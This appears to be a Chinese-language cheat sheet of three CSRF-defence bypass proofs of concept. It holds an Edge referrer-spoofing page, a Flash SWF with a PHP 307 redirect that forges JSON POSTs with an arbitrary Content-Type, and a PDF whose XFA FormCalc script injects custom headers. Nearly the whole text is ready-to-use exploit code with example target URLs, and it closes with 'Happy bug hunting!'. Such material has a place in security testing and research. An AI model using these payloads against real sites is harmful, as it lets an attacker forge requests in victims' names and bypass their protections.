#1. Bypass只验证Referrer的CSRF防御
//Edge only
//Ref:https://www.cracking.com.ar/demos/referer/02/
<h2>Edge Referrer Spoof II</h2>
Referrer to Spoof: <input id="spoofed_referer" value="https://www.microsoft.com/" type="text" size="50"/>
<br /><br />
Fooled WebSite: <input id="fooled_website" value="https://www.whatismyreferer.com" type="text" size="50"/>
<br /><br />
<input type="button" value="Spoof Me" onclick="spoofMe()" />
<script>
function spoofMe()
{
var win = window.open("redir.php?URL=" + spoofed_referer.value);
var ifr = win.document.createElement("iframe");
win.document.appendChild(ifr);
win[0].opener = win;
win[0].setTimeout("alert('Thread blocker. \\nClose me once the site starts loading behind.\\nThen we will automatically redirect with the forged referrer');opener.location='"+fooled_website.value +"'");
}
</script>#2. Bypass只验证Content-Type请求头的CSRF防御
//受害者浏览器需要安装flash&开启flash
//Ref:https://github.com/sp1d3r/swf_json_csrf/
//source.as
package
{
import flash.display.Loader;
import flash.display.LoaderInfo;
import flash.display.Sprite;
import flash.net.URLLoader;
import flash.net.URLRequest;
import flash.net.URLRequestHeader;
import flash.net.URLRequestMethod;
public class re extends Sprite
{
public function re()
{
var myJson: String = this.root.loaderInfo.parameters.jsonData;
var url: String = this.root.loaderInfo.parameters.php_url;
var endpoint: String = this.root.loaderInfo.parameters.endpoint;
var ct: String = (this.root.loaderInfo.parameters.ct)?this.root.loaderInfo.parameters.ct:"application/json";
var request: URLRequest = new URLRequest(url + "?endpoint=" + endpoint);
request.requestHeaders.push(new URLRequestHeader("Content-Type", ct));
request.data = myJson;
request.method = URLRequestMethod.POST;
var urlLoader: URLLoader = new URLLoader();
try
{
urlLoader.load(request);
return;
}
catch(e: Error)
{
trace(e);
return;
}
}
}
}
//redirect.php
<?php
header("Location: ".$_GET["endpoint"], true, 307);
?>
//请求示例
//https://yourhost.com/test.swf?jsonData={"test":1}&php_url=https://yourhost.com/test.php&endpoint=https://targethost.com/endpoint#3. Bypass只验证自定义HTTP头的CSRF防御
//受害者需要使用IE且IE安装有Acrobat Reader
//ref:http://insert-script.blogspot.jp/2015/05/pdf-mess-with-web.html
//test.pdf
% a PDF file using an XFA
% most whitespace can be removed (truncated to 570 bytes or so...)
% Ange Albertini BSD Licence 2012
% a little bit modified to show possible header injection via formcalc
%PDF-1. % can be truncated to %PDF-\0
1 0 obj <<>>
stream
<xdp:xdp xmlns:xdp="http://ns.adobe.com/xdp/">
<config><present><pdf>
<interactive>1</interactive>
</pdf></present></config>
<template>
<subform name="_">
<pageSet/>
<field id="Hello World!">
<event activity="initialize">
<script contentType='application/x-formcalc'>
Post("http://sameOrigin.com/redirect.php","YOUR POST DATA","text/plain","utf-8","Content-Type: DolphinTest: AAA")
</script>
</event>
</field>
</subform>
</template>
</xdp:xdp>
endstream
endobj
trailer <<
/Root <<
/AcroForm <<
/Fields [<<
/T (0)
/Kids [<<
/Subtype /Widget
/Rect []
/T ()
/FT /Btn
>>]
>>]
/XFA 1 0 R
>>
/Pages <<>>
>>
>>
//redirect.php
<?php
header("Location: http://example.com", true, 307);
?>
//请求示例
//http://sameOrigin.com/test.pdfHappy bug hunting!